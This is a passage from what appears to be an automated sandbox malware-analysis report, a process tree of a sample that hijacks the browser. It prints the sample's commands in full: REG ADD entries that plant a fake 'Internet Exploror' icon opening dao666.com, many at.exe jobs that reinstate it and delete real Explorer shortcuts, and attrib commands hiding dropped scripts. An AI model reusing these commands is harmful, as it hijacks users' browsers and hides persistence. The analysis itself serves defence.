3232 cmd.exe 105 PID 3232 wrote to memory of 3676 3232 cmd.exe 105 PID 3232 wrote to memory of 4344 3232 cmd.exe 106 PID 3232 wrote to memory of 4344 3232 cmd.exe 106 PID 3232 wrote to memory of 4344 3232 cmd.exe 106 PID 3232 wrote to memory of 3588 3232 cmd.exe 107 PID 3232 wrote to memory of 3588 3232 cmd.exe 107 PID 3232 wrote to memory of 3588 3232 cmd.exe 107 PID 3232 wrote to memory of 628 3232 cmd.exe 108 PID 3232 wrote to memory of 628 3232 cmd.exe 108 PID 3232 wrote to memory of 628 3232 cmd.exe 108 PID 3232 wrote to memory of 396 3232 cmd.exe 208 PID 3232 wrote to memory of 396 3232 cmd.exe 208 PID 3232 wrote to memory of 396 3232 cmd.exe 208 PID 3232 wrote to memory of 3224 3232 cmd.exe 110 PID 3232 wrote to memory of 3224 3232 cmd.exe 110 -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 672 attrib.exe 3696 attrib.exe 4948 attrib.exe 1888 attrib.exe 1380 attrib.exe 4792 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:968 CREDAT:17410 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4448
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\tool.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1068
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f4⤵
- Modifies registry class
PID:4684
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f4⤵
- Modifies registry class
PID:1348
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1888
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3512
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3476
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4828
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:448
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"4⤵
- Modifies registry class
PID:884
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f4⤵
- Modifies registry class
PID:4588
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4072
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3676
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4344
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3588
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"4⤵
- Modifies registry class
PID:628
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:396
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f4⤵
- Modifies registry class
PID:3224
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3444
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5092
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:1688
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:808
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:4816
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:3164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\runonce.cmd3⤵
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\SysWOW64\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
- System Service Discovery
PID:3584
-
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3692
-
-
C:\Windows\SysWOW64\net.exenet start "Task Scheduler"4⤵
- System Service Discovery
PID:3216 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "Task Scheduler"5⤵
- System Location Discovery: System Language Discovery
- System Service Discovery
PID:1508
-
-
-
C:\Windows\SysWOW64\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:5076
-
-
C:\Windows\SysWOW64\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:1796
-
-
C:\Windows\SysWOW64\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1040
-
-
C:\Windows\SysWOW64\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:4868
-
-
C:\Windows\SysWOW64\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:3148
-
-
C:\Windows\SysWOW64\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2608
-
-
C:\Windows\SysWOW64\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1684
-
-
C:\Windows\SysWOW64\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:4332
-
-
C:\Windows\SysWOW64\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:4308
-
-
C:\Windows\SysWOW64\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Windows\SysWOW64\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:3712
-
-
C:\Windows\SysWOW64\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:2668
-
-
C:\Windows\SysWOW64\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:724
-
-
C:\Windows\SysWOW64\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2068
-
-
C:\Windows\SysWOW64\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:4976
-
-
C:\Windows\SysWOW64\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:1336
-
-
C:\Windows\SysWOW64\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2828
-
-
C:\Windows\SysWOW64\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:4964
-
-
C:\Windows\SysWOW64\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:3436
-
-
C:\Windows\SysWOW64\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
C:\Windows\SysWOW64\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:4780
-
-
C:\Windows\SysWOW64\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Windows\SysWOW64\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:4792
-
-
C:\Windows\SysWOW64\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:672
-
-
C:\Windows\SysWOW64\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:3696
-
-
C:\Windows\SysWOW64\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:4392
-
-
C:\Windows\SysWOW64\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:4772
-
-
C:\Windows\SysWOW64\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Windows\SysWOW64\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:936
-
-
C:\Windows\SysWOW64\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:924
-
-
C:\Windows\SysWOW64\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:3496
-
-
C:\Windows\SysWOW64\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:2496
-
-
C:\Windows\SysWOW64\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:3208
-
-
C:\Windows\SysWOW64\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:2180
-
-
C:\Windows\SysWOW64\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:3924
-
-
C:\Windows\SysWOW64\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3500
-
-
C:\Windows\SysWOW64\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:4764
-
-
C:\Windows\SysWOW64\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1984
-
-
C:\Windows\SysWOW64\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:3916
-
-
C:\Windows\SysWOW64\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵
- System Location Discovery: System Language Discovery
PID:4568
-
-
C:\Windows\SysWOW64\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3232
-
-
C:\Windows\SysWOW64\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:2680
-
-
C:\Windows\SysWOW64\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1344
-
-
C:\Windows\SysWOW64\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵
- System Location Discovery: System Language Discovery
PID:1200
-
-
C:\Windows\SysWOW64\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"4⤵PID:1892
-
-
C:\Windows\SysWOW64\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- System Location Discovery: System Language Discovery
PID:1508
-
-
C:\Windows\SysWOW64\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
PID:4600
-
-
C:\Windows\SysWOW64\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
PID:4364
-
-
C:\Windows\SysWOW64\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵PID:1572
-
-
C:\Windows\SysWOW64\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Windows\SysWOW64\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:4012
-
-
C:\Windows\SysWOW64\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"4⤵PID:3380
-
-
C:\Windows\SysWOW64\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵
- System Location Discovery: System Language Discovery
PID:1256
-
-
C:\Windows\SysWOW64\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
C:\Windows\SysWOW64\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:3936
-
-
C:\Windows\SysWOW64\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"4⤵PID:4428
-
-
C:\Windows\SysWOW64\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵PID:1092
-
-
C:\Windows\SysWOW64\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:1760
-
-
C:\Windows\SysWOW64\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"4⤵PID:4576
-
-
C:\Windows\SysWOW64\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"4⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Windows\SysWOW64\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd4⤵
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Windows\SysWOW64\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"4⤵PID:4800
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd3⤵
- Drops file in Program Files directory
- Drops file in Windows directory
PID:1012 -
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\361.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1380
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4792
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\tool.cmd"4⤵
- Sets file to hidden
- Drops file in Program Files directory
